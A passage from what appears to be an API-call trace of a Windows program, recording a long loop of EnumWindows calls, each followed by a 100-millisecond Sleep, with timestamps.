(lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.703] Sleep (dwMilliseconds=0x64) [0206.742] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.742] Sleep (dwMilliseconds=0x64) [0206.766] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.766] Sleep (dwMilliseconds=0x64) [0206.769] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.770] Sleep (dwMilliseconds=0x64) [0206.774] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.774] Sleep (dwMilliseconds=0x64) [0206.778] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.778] Sleep (dwMilliseconds=0x64) [0206.781] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.781] Sleep (dwMilliseconds=0x64) [0206.802] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.803] Sleep (dwMilliseconds=0x64) [0206.832] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.832] Sleep (dwMilliseconds=0x64) [0206.872] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.872] Sleep (dwMilliseconds=0x64) [0206.970] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0206.971] Sleep (dwMilliseconds=0x64) [0207.035] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.035] Sleep (dwMilliseconds=0x64) [0207.101] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.101] Sleep (dwMilliseconds=0x64) [0207.164] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.165] Sleep (dwMilliseconds=0x64) [0207.204] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.204] Sleep (dwMilliseconds=0x64) [0207.244] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.245] Sleep (dwMilliseconds=0x64) [0207.250] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.250] Sleep (dwMilliseconds=0x64) [0207.255] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.256] Sleep (dwMilliseconds=0x64) [0207.261] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.261] Sleep (dwMilliseconds=0x64) [0207.263] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.263] Sleep (dwMilliseconds=0x64) [0207.265] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.265] Sleep (dwMilliseconds=0x64) [0207.270] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.270] Sleep (dwMilliseconds=0x64) [0207.272] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.273] Sleep (dwMilliseconds=0x64) [0207.275] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.275] Sleep (dwMilliseconds=0x64) [0207.277] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.278] Sleep (dwMilliseconds=0x64) [0207.280] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.280] Sleep (dwMilliseconds=0x64) [0207.282] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.283] Sleep (dwMilliseconds=0x64) [0207.284] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.285] Sleep (dwMilliseconds=0x64) [0207.304] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.304] Sleep (dwMilliseconds=0x64) [0207.364] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.364] Sleep (dwMilliseconds=0x64) [0207.460] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.460] Sleep (dwMilliseconds=0x64) [0207.640] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.641] Sleep (dwMilliseconds=0x64) [0207.720] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.721] Sleep (dwMilliseconds=0x64) [0207.761] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.761] Sleep (dwMilliseconds=0x64) [0207.801] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.802] Sleep (dwMilliseconds=0x64) [0207.841] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.842] Sleep (dwMilliseconds=0x64) [0207.862] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.862] Sleep (dwMilliseconds=0x64) [0207.867] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.867] Sleep (dwMilliseconds=0x64) [0207.874] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.874] Sleep (dwMilliseconds=0x64) [0207.877] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.877] Sleep (dwMilliseconds=0x64) [0207.880] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.881] Sleep (dwMilliseconds=0x64) [0207.883] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.884] Sleep (dwMilliseconds=0x64) [0207.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.889] Sleep (dwMilliseconds=0x64) [0207.904] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.905] Sleep (dwMilliseconds=0x64) [0207.934] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.934] Sleep (dwMilliseconds=0x64) [0207.937] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.938] Sleep (dwMilliseconds=0x64) [0207.942] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.942] Sleep (dwMilliseconds=0x64) [0207.947] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.947] Sleep (dwMilliseconds=0x64) [0207.960] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0207.961] Sleep (dwMilliseconds=0x64) [0208.030] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.031] Sleep (dwMilliseconds=0x64) [0208.142] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.142] Sleep (dwMilliseconds=0x64) [0208.212] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.212] Sleep (dwMilliseconds=0x64) [0208.359] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.359] Sleep (dwMilliseconds=0x64) [0208.447] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.447] Sleep (dwMilliseconds=0x64) [0208.546] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.546] Sleep (dwMilliseconds=0x64) [0208.664] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.664] Sleep (dwMilliseconds=0x64) [0208.806] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.806] Sleep (dwMilliseconds=0x64) [0208.870] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.871] Sleep (dwMilliseconds=0x64) [0208.923] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.923] Sleep (dwMilliseconds=0x64) [0208.970] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0208.970] Sleep (dwMilliseconds=0x64) [0209.014] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.015] Sleep (dwMilliseconds=0x64) [0209.027] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.028] Sleep (dwMilliseconds=0x64) [0209.032] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.033] Sleep (dwMilliseconds=0x64) [0209.037] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.037] Sleep (dwMilliseconds=0x64) [0209.054] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.055] Sleep (dwMilliseconds=0x64) [0209.058] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.059] Sleep (dwMilliseconds=0x64) [0209.063] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.063] Sleep (dwMilliseconds=0x64) [0209.068] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.069] Sleep (dwMilliseconds=0x64) [0209.074] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.074] Sleep (dwMilliseconds=0x64) [0209.082] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.083] Sleep (dwMilliseconds=0x64) [0209.142] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.142] Sleep (dwMilliseconds=0x64) [0209.209] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.210] Sleep (dwMilliseconds=0x64) [0209.251] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.252] Sleep (dwMilliseconds=0x64) [0209.297] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.297] Sleep (dwMilliseconds=0x64) [0209.348] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.349] Sleep (dwMilliseconds=0x64) [0209.414] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.414] Sleep (dwMilliseconds=0x64) [0209.490] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.528] Sleep (dwMilliseconds=0x64) [0209.632] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.632] Sleep (dwMilliseconds=0x64) [0209.723] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.732] Sleep (dwMilliseconds=0x64) [0209.755] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.757] Sleep (dwMilliseconds=0x64) [0209.765] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.766] Sleep (dwMilliseconds=0x64) [0209.771] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.771] Sleep (dwMilliseconds=0x64) [0209.779] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.780] Sleep (dwMilliseconds=0x64) [0209.792] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.795] Sleep (dwMilliseconds=0x64) [0209.799] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.799] Sleep (dwMilliseconds=0x64) [0209.802] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.802] Sleep (dwMilliseconds=0x64) [0209.807] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.808] Sleep (dwMilliseconds=0x64) [0209.813] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.813] Sleep (dwMilliseconds=0x64) [0209.817] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.818] Sleep (dwMilliseconds=0x64) [0209.821] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.821] Sleep (dwMilliseconds=0x64) [0209.824] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.824] Sleep (dwMilliseconds=0x64) [0209.827] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.827] Sleep (dwMilliseconds=0x64) [0209.842] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.843] Sleep (dwMilliseconds=0x64) [0209.845] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.846] Sleep (dwMilliseconds=0x64) [0209.883] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.884] Sleep (dwMilliseconds=0x64) [0209.924] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.924] Sleep (dwMilliseconds=0x64) [0209.963] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0209.963] Sleep (dwMilliseconds=0x64) [0210.016] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.017] Sleep (dwMilliseconds=0x64) [0210.064] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.064] Sleep (dwMilliseconds=0x64) [0210.128] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.128] Sleep (dwMilliseconds=0x64) [0210.170] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.170] Sleep (dwMilliseconds=0x64) [0210.211] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.211] Sleep (dwMilliseconds=0x64) [0210.218] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.219] Sleep (dwMilliseconds=0x64) [0210.224] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.224] Sleep (dwMilliseconds=0x64) [0210.228] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.228] Sleep (dwMilliseconds=0x64) [0210.232] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.232] Sleep (dwMilliseconds=0x64) [0210.235] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.236] Sleep (dwMilliseconds=0x64) [0210.239] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.240] Sleep (dwMilliseconds=0x64) [0210.242] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.242] Sleep (dwMilliseconds=0x64) [0210.251] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.251] Sleep (dwMilliseconds=0x64) [0210.271] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.272] Sleep (dwMilliseconds=0x64) [0210.307] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.345] Sleep (dwMilliseconds=0x64) [0210.421] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.421] Sleep (dwMilliseconds=0x64) [0210.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.513] Sleep (dwMilliseconds=0x64) [0210.617] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.618] Sleep (dwMilliseconds=0x64) [0210.659] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.660] Sleep (dwMilliseconds=0x64) [0210.883] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.883] Sleep (dwMilliseconds=0x64) [0210.940] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.940] Sleep (dwMilliseconds=0x64) [0210.980] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0210.980] Sleep (dwMilliseconds=0x64) [0211.012] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.013] Sleep (dwMilliseconds=0x64) [0211.016] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.016] Sleep (dwMilliseconds=0x64) [0211.020] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.021] Sleep (dwMilliseconds=0x64) [0211.024] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.024] Sleep (dwMilliseconds=0x64) [0211.026] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.027] Sleep (dwMilliseconds=0x64) [0211.033] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.033] Sleep (dwMilliseconds=0x64) [0211.077] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.077] Sleep (dwMilliseconds=0x64) [0211.105] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.106] Sleep (dwMilliseconds=0x64) [0211.108] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.109] Sleep (dwMilliseconds=0x64) [0211.177] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.178] Sleep (dwMilliseconds=0x64) [0211.230] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.230] Sleep (dwMilliseconds=0x64) [0211.323] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.323] Sleep (dwMilliseconds=0x64) [0211.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.373] Sleep (dwMilliseconds=0x64) [0211.449] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.449] Sleep (dwMilliseconds=0x64) [0211.548] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.548] Sleep (dwMilliseconds=0x64) [0211.620] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.620] Sleep (dwMilliseconds=0x64) [0211.658] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.659] Sleep (dwMilliseconds=0x64) [0211.686] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.686] Sleep (dwMilliseconds=0x64) [0211.691] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.691] Sleep (dwMilliseconds=0x64) [0211.695] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.695] Sleep (dwMilliseconds=0x64) [0211.701] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.701] Sleep (dwMilliseconds=0x64) [0211.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.705] Sleep (dwMilliseconds=0x64) [0211.712] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.713] Sleep (dwMilliseconds=0x64) [0211.715] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.715] Sleep (dwMilliseconds=0x64) [0211.719] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.719] Sleep (dwMilliseconds=0x64) [0211.722] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.722] Sleep (dwMilliseconds=0x64) [0211.727] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.727] Sleep (dwMilliseconds=0x64) [0211.730] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.731] Sleep (dwMilliseconds=0x64) [0211.740] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.741] Sleep (dwMilliseconds=0x64) [0211.744] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.745] Sleep (dwMilliseconds=0x64) [0211.748] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.749] Sleep (dwMilliseconds=0x64) [0211.753] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.753] Sleep (dwMilliseconds=0x64) [0211.788] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.788] Sleep (dwMilliseconds=0x64) [0211.856] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.856] Sleep (dwMilliseconds=0x64) [0211.936] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0211.936] Sleep (dwMilliseconds=0x64) [0212.018] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.018] Sleep (dwMilliseconds=0x64) [0212.101] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.101] Sleep (dwMilliseconds=0x64) [0212.140] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.181] Sleep (dwMilliseconds=0x64) [0212.224] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.224] Sleep (dwMilliseconds=0x64) [0212.263] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.264] Sleep (dwMilliseconds=0x64) [0212.304] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.304] Sleep (dwMilliseconds=0x64) [0212.321] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.321] Sleep (dwMilliseconds=0x64) [0212.324] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.324] Sleep (dwMilliseconds=0x64) [0212.327] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.327] Sleep (dwMilliseconds=0x64) [0212.330] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.330] Sleep (dwMilliseconds=0x64) [0212.338] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.338] Sleep (dwMilliseconds=0x64) [0212.342] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.342] Sleep (dwMilliseconds=0x64) [0212.347] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.347] Sleep (dwMilliseconds=0x64) [0212.351] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.351] Sleep (dwMilliseconds=0x64) [0212.354] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.354] Sleep (dwMilliseconds=0x64) [0212.359] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.359] Sleep (dwMilliseconds=0x64) [0212.362] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.363] Sleep (dwMilliseconds=0x64) [0212.368] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.368] Sleep (dwMilliseconds=0x64) [0212.372] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.372] Sleep (dwMilliseconds=0x64) [0212.386] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.386] Sleep (dwMilliseconds=0x64) [0212.392] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.392] Sleep (dwMilliseconds=0x64) [0212.426] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.427] Sleep (dwMilliseconds=0x64) [0212.499] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.499] Sleep (dwMilliseconds=0x64) [0212.587] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.588] Sleep (dwMilliseconds=0x64) [0212.664] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.665] Sleep (dwMilliseconds=0x64) [0212.705] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.705] Sleep (dwMilliseconds=0x64) [0212.746] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.747] Sleep (dwMilliseconds=0x64) [0212.785] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.785] Sleep (dwMilliseconds=0x64) [0212.822] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.823] Sleep (dwMilliseconds=0x64) [0212.857] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.858] Sleep (dwMilliseconds=0x64) [0212.861] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.861] Sleep (dwMilliseconds=0x64) [0212.866] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.866] Sleep (dwMilliseconds=0x64) [0212.868] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.868] Sleep (dwMilliseconds=0x64) [0212.873] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.873] Sleep (dwMilliseconds=0x64) [0212.877] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.877] Sleep (dwMilliseconds=0x64) [0212.889] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.889] Sleep (dwMilliseconds=0x64) [0212.891] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.891] Sleep (dwMilliseconds=0x64) [0212.910] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.910] Sleep (dwMilliseconds=0x64) [0212.939] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.940] Sleep (dwMilliseconds=0x64) [0212.987] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0212.987] Sleep (dwMilliseconds=0x64) [0213.095] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.095] Sleep (dwMilliseconds=0x64) [0213.211] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.212] Sleep (dwMilliseconds=0x64) [0213.254] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.254] Sleep (dwMilliseconds=0x64) [0213.296] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.297] Sleep (dwMilliseconds=0x64) [0213.337] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.337] Sleep (dwMilliseconds=0x64) [0213.379] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.379] Sleep (dwMilliseconds=0x64) [0213.422] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.422] Sleep (dwMilliseconds=0x64) [0213.463] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.464] Sleep (dwMilliseconds=0x64) [0213.480] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.480] Sleep (dwMilliseconds=0x64) [0213.485] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.485] Sleep (dwMilliseconds=0x64) [0213.487] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.488] Sleep (dwMilliseconds=0x64) [0213.490] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.491] Sleep (dwMilliseconds=0x64) [0213.495] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.495] Sleep (dwMilliseconds=0x64) [0213.507] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.507] Sleep (dwMilliseconds=0x64) [0213.511] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.511] Sleep (dwMilliseconds=0x64) [0213.513] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.514] Sleep (dwMilliseconds=0x64) [0213.517] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.517] Sleep (dwMilliseconds=0x64) [0213.524] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.524] Sleep (dwMilliseconds=0x64) [0213.527] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.528] Sleep (dwMilliseconds=0x64) [0213.531] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.531] Sleep (dwMilliseconds=0x64) [0213.542] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.542] Sleep (dwMilliseconds=0x64) [0213.547] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.547] Sleep (dwMilliseconds=0x64) [0213.553] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.553] Sleep (dwMilliseconds=0x64) [0213.557] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.558] Sleep (dwMilliseconds=0x64) [0213.564] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.564] Sleep (dwMilliseconds=0x64) [0213.586] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.586] Sleep (dwMilliseconds=0x64) [0213.657] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.657] Sleep (dwMilliseconds=0x64) [0213.733] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.734] Sleep (dwMilliseconds=0x64) [0213.811] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.811] Sleep (dwMilliseconds=0x64) [0213.901] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.901] Sleep (dwMilliseconds=0x64) [0213.976] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0213.977] Sleep (dwMilliseconds=0x64) [0214.019] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.020] Sleep (dwMilliseconds=0x64) [0214.066] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.067] Sleep (dwMilliseconds=0x64) [0214.080] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.080] Sleep (dwMilliseconds=0x64) [0214.084] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.084] Sleep (dwMilliseconds=0x64) [0214.089] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.090] Sleep (dwMilliseconds=0x64) [0214.092] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.092] Sleep (dwMilliseconds=0x64) [0214.095] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.095] Sleep (dwMilliseconds=0x64) [0214.100] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.100] Sleep (dwMilliseconds=0x64) [0214.104] EnumWindows (lpEnumFunc=0x2843dc0, lParam=0x2830000) [0214.105] Sleep (dwMilliseconds=0x64) [0214.109] EnumWindows (lpEnumFunc=0x2843dc0, 